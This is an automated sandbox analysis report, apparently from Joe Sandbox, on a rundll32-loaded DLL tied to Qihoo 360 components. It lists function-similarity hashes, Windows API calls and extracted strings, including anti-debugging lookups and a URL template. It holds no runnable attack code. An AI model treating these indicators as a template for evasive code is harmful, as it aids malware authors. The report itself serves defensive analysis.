                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CountCriticalSectionTick$CloseEnterLeaveOpenQueryValue
                                                                  • String ID: dfsu11yy38277*(*6fhjsdkfds
                                                                  • API String ID: 4271658480-2650022146
                                                                  • Opcode ID: 0bb96f617ef2d1086e71c411e54c36657af4b2cd300dcf6be980ec3523e171b7
                                                                  • Instruction ID: dce0af6b373f41b2cde99525f258e7f40e176b48fd2bd51a90361080345aed67
                                                                  • Opcode Fuzzy Hash: 0bb96f617ef2d1086e71c411e54c36657af4b2cd300dcf6be980ec3523e171b7
                                                                  • Instruction Fuzzy Hash: 1DE19932200A0896EB92DB65E8443DD67A1F78DBD8F908125FE9D4B7A5DF38C789C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: File$Size$CloseCreateHandleRead
                                                                  • String ID:
                                                                  • API String ID: 1601809017-0
                                                                  • Opcode ID: 6c38b284369adc8e8a95ca7bd81b2def578c31ecd07c0865210070f76e2fb98a
                                                                  • Instruction ID: 513f97a3dac13d024bc23301dce07c49bc5a225dcf8c593d0dc48b4e525c804c
                                                                  • Opcode Fuzzy Hash: 6c38b284369adc8e8a95ca7bd81b2def578c31ecd07c0865210070f76e2fb98a
                                                                  • Instruction Fuzzy Hash: 2E21803260475487E7819F2AE8443997BA1F788FD0F658225EF6547BA4DF38C64ACB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$??3@
                                                                  • String ID: Catalog_Entries$Num_Catalog_Entries
                                                                  • API String ID: 1245774677-781996053
                                                                  • Opcode ID: 6b8a8c89c4b699f957cd55a4368444c75396a5c1355a13cca8d488b9109841c6
                                                                  • Instruction ID: 9fcea3ce77e1ed4f5330bab62f44b4aa9bf918aefdaa2edac95f8aa4354510da
                                                                  • Opcode Fuzzy Hash: 6b8a8c89c4b699f957cd55a4368444c75396a5c1355a13cca8d488b9109841c6
                                                                  • Instruction Fuzzy Hash: E6C14132205F8481DAA1CF15F98039EB3A4F789BE4F598625EAED47B98CF38C155C744
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@??3@
                                                                  • String ID: Catalog_Entries$Num_Catalog_Entries
                                                                  • API String ID: 1936579350-781996053
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 000000018004048F
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800404A5
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800404DD
                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 0000000180040553
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 0000000180040569
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800405A1
                                                                  • Sleep.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 000000018004061C
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$Enter$Sleep
                                                                  • String ID:
                                                                  • API String ID: 950586405-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateValue
                                                                  • String ID: 360scan
                                                                  • API String ID: 1818849710-2450673717
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ?terminate@@ExceptionThrow__crt_fast_encode_pointermalloc
                                                                  • String ID: csm
                                                                  • API String ID: 760693298-1018135373
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCreateHandleModuleProc
                                                                  • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                  • API String ID: 1964897782-2994018265
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AppendFileModuleNamePathmemset
                                                                  • String ID: ..\Config\cloudcfg.dat$cloudcfg.dat
                                                                  • API String ID: 1620117007-2349577946
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$??3@EnterLeave
                                                                  • String ID:
                                                                  • API String ID: 3906572401-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _errno
                                                                  • String ID:
                                                                  • API String ID: 2918714741-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@memmove$??3@
                                                                  • String ID:
                                                                  • API String ID: 232491532-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _swprintf_c_l.LIBCMT ref: 000000018006A6B0
                                                                  • memmove.MSVCRT(00000000,00000008,00000000,000000018006AA37,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 000000018006A6DB
                                                                  • memmove.MSVCRT(00000000,00000008,00000000,000000018006AA37,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 000000018006A755
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: memmove$_swprintf_c_l
                                                                  • String ID:
                                                                  • API String ID: 3930809162-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$Enter
                                                                  • String ID:
                                                                  • API String ID: 2978645861-0
                                                                  • Opcode ID: 84f7991fb58de1b865a10277cce647e74e53e0d7bb9d3c9fb8eb0733b83dca90
                                                                  • Instruction ID: 73bd4c9cd9396375e0c1b942217bf14bfc10cb3082dae23d56ea31479293823c
                                                                  • Instruction Fuzzy Hash: 19413932641B0896FA869F21EC943E83764F749FD9F598115EAA50B3A5CF28C74EC304
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: ??2@memmove$??3@
                                                                  • String ID:
                                                                  • API String ID: 232491532-0
                                                                  • Opcode ID: 4c8a09d1fefffe74558815fc45e4f8bd62bc61723e2fbaaf498aee53098e704a
                                                                  • Instruction ID: 3308181ea52ff5a0dd97f5d36b69886329373971ad435e2f25c4df82c4de258d
                                                                  • Instruction Fuzzy Hash: 8231D332705B8894EF5ACF16D9443986362F709FE0F588615EE6E07BE6DE78D299C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 0000000180016298
                                                                  • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162A6
                                                                  • ??3@YAXPEAX@Z.MSVCRT ref: 00000001800162DE
                                                                  • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162E8
                                                                  • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162F6
                                                                  Similarity
                                                                  • API ID: memmove$??3@
                                                                  • String ID:
                                                                  • API String ID: 2321372689-0
                                                                  • Opcode ID: 2a291cfa02ae191c963c7aa5d4289e2a243c3539a711814b18b996a7d7b87c53
                                                                  • Instruction ID: b2b38ff55e60cbfe57fc328909b4bad170525be2db7207aa5bf6da73de3f6202
                                                                  • Instruction Fuzzy Hash: 7831D272700A8891DB569F12E9043DE6351F748FD0F948522EF5E4BBA6DE3CC259C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: memmove$??3@
                                                                  • String ID:
                                                                  • API String ID: 2321372689-0
                                                                  • Opcode ID: d7a3fd22b0ebd3110ce60677b93657e49589d130bcba2fb1c65b72589847b85a
                                                                  • Instruction ID: 762f5997fa826d969e67cf094c143b4ceaf1448be14793aa958531d929a095e6
                                                                  • Instruction Fuzzy Hash: 8231A172300E9885D94AEE5286843DCA765F74DFD4F66C521BF680BB96CE38D24AC304
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: Window$AncestorFromPointRectmemset
                                                                  • String ID:
                                                                  • API String ID: 3039914759-0
                                                                  • Opcode ID: fc34e6d246657f66188d6f8573fbe65fb936fbcf3c4029c0371e48d01d16a740
                                                                  • Instruction ID: 06be680ac09e87041cb82e4d3d0d5ca659cc845397dc933fd24aa54eca265516
                                                                  • Instruction Fuzzy Hash: 1931CD32615A4486F7E28F25DC487DA63A4FB8C7C4F449020FE5977694EF39CA99D700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: _errnoiswspace$memmove
                                                                  • String ID:
                                                                  • API String ID: 972559988-0
                                                                  • Opcode ID: 62484f1315cc315bf352517e41dc366093ff24740a399b805c186dd2600ce3b7
                                                                  • Instruction ID: aea15859d9ef88290176a7c9cabebc096ef147a52e12ca1286494642d1a9418c
                                                                  • Instruction Fuzzy Hash: 3531CBB3601A4886EB99DF54D9847ED33A0F788BC0F18C019EB4A0B792DF3DDA588744
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: ??3@$CriticalSection$Delete$EnterLeave
                                                                  • String ID:
                                                                  • API String ID: 274858031-0
                                                                  • Opcode ID: a29c501b7cb5b62190f2ee82e18e93e4c2b49ef20e282c724fca1469eff036db
                                                                  • Instruction ID: d11087617417198f0cbd7eb66d5c9be171642f9dfb033e604718f16c8d919299
                                                                  • Instruction Fuzzy Hash: 49312A36201E88A2EB569F64E4913DDA360F7897D0F54C522EB9D437A1DF78DAA9C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: _errno
                                                                  • String ID:
                                                                  • API String ID: 2918714741-0
                                                                  • Opcode ID: ef9a1a2487f9f747f790f9b6156918c71975c41e3d5b8d109555e51fa42619a5
                                                                  • Instruction ID: a73d7fb5a67d4d67bba371cf0b3796608c1c1b370b7326418a0f08ed132aa8b6
                                                                  • Instruction Fuzzy Hash: D411E03270468881EAE66B25B1403DE63D0E7487E0F09A226FBAA1B7C5CE3DD5D79714
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: _errno
                                                                  • String ID:
                                                                  • API String ID: 2918714741-0
                                                                  • Opcode ID: c89821886ccf670e100f3b8fb91d8e831a6b96267fb5c2ba29df3964e1113532
                                                                  • Instruction ID: ac3a4cfa431d0ef0eaea2260b684207aebe75cd91c02b4061f0f196fb58aac9a
                                                                  • Instruction Fuzzy Hash: 2611013270878881EAEA6B25B2403DE6391E7487D0F08A125BBAA0B3C5DE3DD5979304
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ??2@$??3@
                                                                  • String ID: %s\NameSpace_Catalog5\Catalog_Entries\%012d
                                                                  • API String ID: 1245774677-2131870787
                                                                  • Opcode ID: af5baddc67ad33526a33c39d65950fd72fb0df208da0cc0d422425bada8017cf
                                                                  • Instruction ID: 67395956b14f0255dc157d00751ecdd5e79b91100998fde5bc7e771f553c8d3c
                                                                  • Instruction Fuzzy Hash: 5C81AFB3700B4882DE65CF15E8447E9A3A5F749BD4F54C222BA9D1B794EF7AD289C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ??2@$??3@
                                                                  • String ID: %s\NameSpace_Catalog5\Catalog_Entries\%012d
                                                                  • API String ID: 1245774677-2131870787
                                                                  • Opcode ID: dfcd8af31725850ee712bb16f67c2dba61d9d14ccc8acf01942b48f66b795e08
                                                                  • Instruction ID: ceb8e503b58a09837b0f64c0a513370a87b020a4d694bdf072cc47396662b60f
                                                                  • Instruction Fuzzy Hash: 8251C47371579C82EE59CB16E5143EA6364B34DBD4F108626BEAD1BBC4DF39C2558300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Time$FileMutexReleaseSystem
                                                                  • String ID: %I64d$__LastModified__
                                                                  • API String ID: 4233779698-1650611527
                                                                  • Opcode ID: 3e8cf2df84acdc051a18ea2821a1bd380114409e3e0b0fa2bea459e4e782fd62
                                                                  • Instruction ID: 09458c959511dc8cfabe6624f5c81a29e97a68172d7e622df1c6d3cc80163a48
                                                                  • Instruction Fuzzy Hash: FF518D72610A0986EB96DB39C8507ED33A0FB49BE8F448321BE3A476E5DF24C649C341
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CloseHeapOpenProcessQueryValue
                                                                  • String ID: dfafidjalkfjdalksjfjklfads
                                                                  • API String ID: 3302636555-1647371548
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: HeapProcessString_vsnwprintf_smemset
                                                                  • String ID: com$error_code
                                                                  • API String ID: 3912638396-1490343999
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CountCriticalErrorInitializeLastSectionSpinmemset
                                                                  • String ID: http://%s/wcheckquery
                                                                  • API String ID: 1980634866-481256882
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressErrorLastProcSleep
                                                                  • String ID: InitOnceExecuteOnce
                                                                  • API String ID: 299661913-4081768745
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: emc$mpt$nct
                                                                  • API String ID: 0-4018135154
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: NTDLL.DLL$ZwSetInformationThread
                                                                  • API String ID: 1646373207-2735485441
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: MutexRelease
                                                                  • String ID: DELETE FROM 'MT'$select * from sqlite_sequence;$update sqlite_sequence set seq = 0 where name='MT';
                                                                  • API String ID: 1638419-14785165
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Value_time64
                                                                  • String ID: MsgCenter$opentime_afterupdate
                                                                  • API String ID: 785988768-2434204715
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@_wcslwrmemset
                                                                  • String ID: Global\QIHOO360_%s
                                                                  • API String ID: 2483156104-3710684550
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Value$AddressHandleModuleProc
                                                                  • String ID: MsgCenter$opentime_traystartup
                                                                  • API String ID: 1929421221-2252518459
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: MsgCenter$opentime_traystartup
                                                                  • API String ID: 3702945584-2252518459
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • sscanf.LEGACY_STDIO_DEFINITIONS ref: 000000018006A519
                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,0000000180069AA1), ref: 000000018006A530
                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,0000000180069AA1), ref: 000000018006A542
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Time$File$LocalSystemsscanf
                                                                  • String ID: %hu-%hu-%hu %hu:%hu:%hu
                                                                  • API String ID: 34346384-1004895946
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: LongNamePathmemsetwcschr
                                                                  • String ID: System32
                                                                  • API String ID: 1234868084-919923750
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FreeLibraryLoad$FindFolderLockPathQuerySizeofSpecialValuefreemallocmemmovememset
                                                                  • String ID: %u.%u.%u$\Internet Explorer\IEXPLORE.EXE
                                                                  • API String ID: 28297470-3177478685
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FilePath$AppendCriticalExistsInitializeModuleNameSection
                                                                  • String ID: ..\360NetBase64.dll
                                                                  • API String ID: 2373086246-4183035884
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
